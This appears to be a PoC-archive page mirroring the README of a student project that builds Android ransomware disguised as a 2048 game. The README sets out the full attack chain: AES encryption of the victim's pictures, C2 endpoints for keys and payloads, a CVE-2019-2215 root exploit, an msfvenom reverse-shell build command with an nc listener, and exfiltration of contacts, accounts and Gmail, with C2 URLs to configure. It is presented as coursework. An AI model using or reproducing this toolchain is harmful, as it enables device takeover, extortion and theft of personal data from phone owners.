关联漏洞
描述
Android Ransomware Development - AES256 encryption + CVE-2019-2215 (reverse root shell) + Data Exfiltration
介绍
# Rootsmart 2.0 w/ cve-2019-2215 + Ransomware
### Disclaimer
This project is solely for educational purposes. This project utilise code from [rkshrksh/2048-Game](https://github.com/rkshrksh/2048-Game) and [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215).
---
## Project Description
This project is part of Singapore Institute of Technology Mobile Security module. The project was done within 6 weeks and the aim of the project was to develop a malicious android application. By doing so, it helped us to learn how security mechanisms are implemented in an Android OS and how we can exercise OWASP Mobile Top 10:2017 M8 - Code Tampering.
The project is proof of concept to showcase a custom written ransomware that utilises AES encryption, weaponising cve-2019-2215, and also exfiltrating data from the infected device.
It is tested on Android 10 and Google Pixel 2 XL.
```
├── 2048-Game // Android Project Folder
├── 2048-keystore // Test-Keystore
├── cve-2019-2215 // Modified cve-2019-2215
│ └── cve-2019-2215.c
├── dropper_server // Dropper server directory
│ ├── cve-2019-2215 // shells.zip content before zipping
│ ├── dropper_server.py // Dropper server program
│ ├── exfiltrated_data.log
│ ├── masterkeys.txt
│ ├── ncat.exe // Netcat windows binary - for Reverse shell listener
│ ├── requirements.txt
│ ├── shells.zip // shells.zip that is hosted in root of dropper server
│ └── venv
└── test_images // test_images for easy adb push <image.ext> /sdcard/Pictures
```
##### Attack Vector:
1. Install, run the application and grant permissions
2. Ransomware will AES encrypt all files in /sdcard/Pictures
3. Each file will be encrypted with a random generated key
4. Keys will be stored in /sdcard/keys.json where each key:value pair is filepath:key
5. GET HTTP to C2 server /get_mk to retrieve MasterKey and VictimID in response body
6. MasterKey will encrypt keys.json, VictimID will be stored in /sdcard/victimID.txt
7. The application will download shells.zip and unzip the contents
8. Execute cve-2019-2215 binary from the unzipped contents
9. A root shell process will be spawn and will run install.sh from the unzipped contents
10. Install.sh will execute rs.elf from the unzipped contents to send a reverse connection to attack server
11. The appliation will exfiltrate the device's gmail, user account information, and contacts.
##### Demonstration
https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4
---
## C2 (Command & Control) - Setup
For this test, ensure that the victim phone and the C2 server are in the same subnet (otherwise host C2 in public internet). There are 3 endpoints for the C2 server that can be found in dropper/dropper_server.py:
1. /process_command - GET to download shells.zip and run the cve-2019-2215 root exploit
2. /get_mk - GET to obtain the victimID:masterkey key-value pair to encrypt /sdcard/keys.json
3. /postData - POST exfiltrated gmail, contacts, account information
##### Reverse Shell Server
```bash
nc -lvnp 1337 # Ideally this should be the same IP as the dropper server
```
##### Dropper Server
```bash
# Generate rs.elf payload
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf
# Better to run flask on Windows if WSL don't port forward localhost traffic to Windows Host
cd dropper
python3 -m venv venv # Create venv
# Activate venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Make sure host shell is root/Administrator
# Run C2 server
python3 dropper_server.py # WSL
python dropper_server.py # Windows
```
shells.zip in /dropper
1. Go to dropper/cve-2019-2215 folder
2. After creating rs.elf, zip rs.elf + cve-2019-2215, install.sh
3. Rename zip file to shells.zip
4. Move shells.zip to /dropper
## Modify the following before compiling APK
Java Classes
```java
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/process_command"; // Line 19
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45
// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change IP and port according to dropper server IP and port
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
```
文件快照
[4.0K] /data/pocs/5e2a117aa3df74392ef8c94f0566bc2b2ad9e407
├── [4.0K] 2048-Game
│ ├── [4.0K] app
│ │ ├── [1.4K] build.gradle
│ │ ├── [1.0K] google-services.json
│ │ ├── [ 724] proguard-rules.pro
│ │ ├── [4.0K] release
│ │ │ ├── [2.0M] app-release.apk
│ │ │ └── [ 370] output-metadata.json
│ │ └── [4.0K] src
│ │ ├── [4.0K] androidTest
│ │ │ └── [4.0K] java
│ │ │ └── [4.0K] aarkay
│ │ │ └── [4.0K] a2048game
│ │ │ └── [ 347] ApplicationTest.java
│ │ ├── [4.0K] main
│ │ │ ├── [1.8K] AndroidManifest.xml
│ │ │ ├── [4.0K] assets
│ │ │ │ └── [263K] ClearSans-Bold.ttf
│ │ │ ├── [4.0K] java
│ │ │ │ └── [4.0K] aarkay
│ │ │ │ └── [4.0K] a2048game
│ │ │ │ ├── [ 981] AnimationCell.java
│ │ │ │ ├── [2.8K] AnimationGrid.java
│ │ │ │ ├── [ 374] Cell.java
│ │ │ │ ├── [2.4K] EncryptFile.kt
│ │ │ │ ├── [ 11K] Encrypt.java
│ │ │ │ ├── [3.9K] Grid.java
│ │ │ │ ├── [7.8K] InputListener.java
│ │ │ │ ├── [2.3K] Locker.java
│ │ │ │ ├── [ 13K] MainActivity.java
│ │ │ │ ├── [ 12K] MainGame.java
│ │ │ │ ├── [ 30K] MainView.java
│ │ │ │ ├── [6.1K] PostData.java
│ │ │ │ ├── [ 864] SplitToolbar.java
│ │ │ │ ├── [4.1K] Temproot.java
│ │ │ │ └── [ 670] Tile.java
│ │ │ └── [4.0K] res
│ │ │ ├── [4.0K] drawable-hdpi
│ │ │ │ ├── [ 200] ic_pause.png
│ │ │ │ ├── [ 283] ic_play_arrow_white_48dp.png
│ │ │ │ ├── [ 734] ic_refresh_white_48dp.png
│ │ │ │ ├── [ 390] ic_shop_two_white_48dp.png
│ │ │ │ ├── [ 434] ic_thumb_up_white_48dp.png
│ │ │ │ └── [ 477] ic_undo_white_48dp.png
│ │ │ ├── [4.0K] drawable-ldpi
│ │ │ │ └── [ 167] ic_pause.png
│ │ │ ├── [4.0K] drawable-mdpi
│ │ │ │ ├── [ 407] background_rectangle.xml
│ │ │ │ ├── [ 398] cell_rectangle_1024.xml
│ │ │ │ ├── [ 396] cell_rectangle_128.xml
│ │ │ │ ├── [ 395] cell_rectangle_16.xml
│ │ │ │ ├── [ 398] cell_rectangle_2048.xml
│ │ │ │ ├── [ 397] cell_rectangle_256.xml
│ │ │ │ ├── [ 394] cell_rectangle_2.xml
│ │ │ │ ├── [ 395] cell_rectangle_32.xml
│ │ │ │ ├── [ 398] cell_rectangle_4096.xml
│ │ │ │ ├── [ 394] cell_rectangle_4.xml
│ │ │ │ ├── [ 397] cell_rectangle_512.xml
│ │ │ │ ├── [ 395] cell_rectangle_64.xml
│ │ │ │ ├── [ 394] cell_rectangle_8.xml
│ │ │ │ ├── [ 398] cell_rectangle.xml
│ │ │ │ ├── [ 402] fade_rectangle.xml
│ │ │ │ ├── [ 217] ic_pause.png
│ │ │ │ ├── [ 220] ic_play_arrow_white_48dp.png
│ │ │ │ ├── [ 509] ic_refresh_white_48dp.png
│ │ │ │ ├── [ 293] ic_shop_two_white_48dp.png
│ │ │ │ ├── [ 307] ic_thumb_up_white_48dp.png
│ │ │ │ ├── [ 339] ic_undo_white_48dp.png
│ │ │ │ └── [ 404] light_up_rectangle.xml
│ │ │ ├── [4.0K] drawable-xhdpi
│ │ │ │ ├── [ 303] ic_pause.png
│ │ │ │ ├── [ 343] ic_play_arrow_white_48dp.png
│ │ │ │ ├── [ 967] ic_refresh_white_48dp.png
│ │ │ │ ├── [ 484] ic_shop_two_white_48dp.png
│ │ │ │ ├── [ 542] ic_thumb_up_white_48dp.png
│ │ │ │ └── [ 606] ic_undo_white_48dp.png
│ │ │ ├── [4.0K] drawable-xxhdpi
│ │ │ │ ├── [ 300] ic_pause.png
│ │ │ │ ├── [ 461] ic_play_arrow_white_48dp.png
│ │ │ │ ├── [1.4K] ic_refresh_white_48dp.png
│ │ │ │ ├── [ 685] ic_shop_two_white_48dp.png
│ │ │ │ ├── [ 768] ic_thumb_up_white_48dp.png
│ │ │ │ └── [ 894] ic_undo_white_48dp.png
│ │ │ ├── [4.0K] drawable-xxxhdpi
│ │ │ │ ├── [ 452] ic_pause.png
│ │ │ │ ├── [ 605] ic_play_arrow_white_48dp.png
│ │ │ │ ├── [1.9K] ic_refresh_white_48dp.png
│ │ │ │ ├── [ 919] ic_shop_two_white_48dp.png
│ │ │ │ ├── [1.1K] ic_thumb_up_white_48dp.png
│ │ │ │ └── [1.1K] ic_undo_white_48dp.png
│ │ │ ├── [4.0K] layout
│ │ │ │ ├── [2.9K] activity_encrypt.xml
│ │ │ │ ├── [ 996] activity_main.xml
│ │ │ │ └── [ 284] bottom_bar.xml
│ │ │ ├── [4.0K] menu
│ │ │ │ └── [ 608] bottom_menu.xml
│ │ │ ├── [4.0K] mipmap-hdpi
│ │ │ │ └── [6.9K] ic_launcher.png
│ │ │ ├── [4.0K] mipmap-mdpi
│ │ │ │ └── [3.7K] ic_launcher.png
│ │ │ ├── [4.0K] mipmap-xhdpi
│ │ │ │ └── [ 11K] ic_launcher.png
│ │ │ ├── [4.0K] mipmap-xxhdpi
│ │ │ │ └── [ 21K] ic_launcher.png
│ │ │ ├── [4.0K] mipmap-xxxhdpi
│ │ │ │ └── [ 35K] ic_launcher.png
│ │ │ ├── [4.0K] values
│ │ │ │ ├── [1.1K] colors.xml
│ │ │ │ ├── [ 211] dimens.xml
│ │ │ │ ├── [ 153] donottranslate.xml
│ │ │ │ ├── [ 889] strings.xml
│ │ │ │ └── [ 324] styles.xml
│ │ │ └── [4.0K] values-w820dp
│ │ │ └── [ 358] dimens.xml
│ │ └── [4.0K] test
│ │ └── [4.0K] java
│ │ └── [4.0K] aarkay
│ │ └── [4.0K] a2048game
│ │ └── [ 309] ExampleUnitTest.java
│ ├── [ 706] build.gradle
│ ├── [4.0K] gradle
│ │ └── [4.0K] wrapper
│ │ ├── [ 52K] gradle-wrapper.jar
│ │ └── [ 236] gradle-wrapper.properties
│ ├── [ 927] gradle.properties
│ ├── [4.9K] gradlew
│ ├── [2.3K] gradlew.bat
│ ├── [ 343] README.md
│ └── [ 15] settings.gradle
├── [4.0K] 2048-keystore
│ └── [2.5K] 2048_keystore_file.jks
├── [4.0K] cve-2019-2215
│ └── [ 29K] cve-2019-2215.c
├── [4.0K] dropper
│ ├── [4.0K] cve-2019-2215
│ │ ├── [ 22K] cve-2019-2215
│ │ ├── [ 51] install.sh
│ │ ├── [ 272] rs.elf
│ │ └── [8.1K] shells.zip
│ ├── [2.6K] dropper_server.py
│ ├── [ 70] masterkeys.txt
│ ├── [1.6M] ncat.exe
│ ├── [ 189] requirements.txt
│ └── [8.1K] shells.zip
├── [9.8M] ICT2207-P3-Team2-Demo.m4v
├── [1.5M] labP3-team02-2022-coursework1-report.pdf
├── [4.6K] README.md
└── [4.0K] test_images
├── [ 88K] image01.png
└── [ 69K] image02.jpg
40 directories, 110 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。